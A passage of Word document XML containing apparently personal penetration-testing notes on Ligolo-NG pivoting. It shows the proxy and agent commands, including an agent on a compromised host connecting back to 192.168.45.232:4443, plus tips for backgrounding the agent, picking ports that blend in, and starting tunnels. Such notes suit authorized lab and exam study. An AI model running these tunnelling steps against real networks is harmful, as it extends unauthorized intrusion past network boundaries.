      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DON'T USE ANY PORT BELOW 1024 or else u need admin on pivot machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ runs the Ligolo‑NG proxy binary (attacker side).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-selfcert </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ generates a self‑signed TLS certificate (so you don’t need to provide your own).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-laddr 0.0.0.0:443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → listen address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = listen on all interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = listen on TCP port 443 (common HTTPS port, blends in).</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect ligolo agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on pivot machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\agent.exe -connect 192.168.45.232:4443 -ignore-cert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used port 4443 here instead of 443 since port 443 is important for tools like tcpdump. But if port 4443 doesn’t work, use other common ports like SMB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → runs the Ligolo agent binary on the compromised host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-connect &lt;IP ADDRESS&gt;:443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ tells agent to connect back to attacker machine’s IP on port 443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ignore-cert</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ignore certificate verification (useful since you’re using -selfcert).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR LINUX, If you want to run the agent in the background</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the end of the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./agent -connect 192.168.45.232:4443 -ignore-cert &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000700">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used port 4443 here instead of 443 since port 443 is important for tools like tcpdump. But if port 4443 doesn’t work, use other common ports like SMB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000701">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000702">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then check all backgrounded processes, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000704">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And to interact with it do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000705">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg %1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000706">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means go inside of job 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000707">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to background it again do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000708">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000709">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this usually stops the agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="322" name="image314.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image314.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17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70C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what correct output looks like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view network sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000710">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000711">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows all connected agents (sessions) to your proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000712">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use your arrow keys to select the session you want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000713">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000714">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">begin tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000715">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000716">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starts the actual tunnel for a selected session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000717">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000718">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000719">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view routes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists all current routes on your machine, including the new ligolo one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
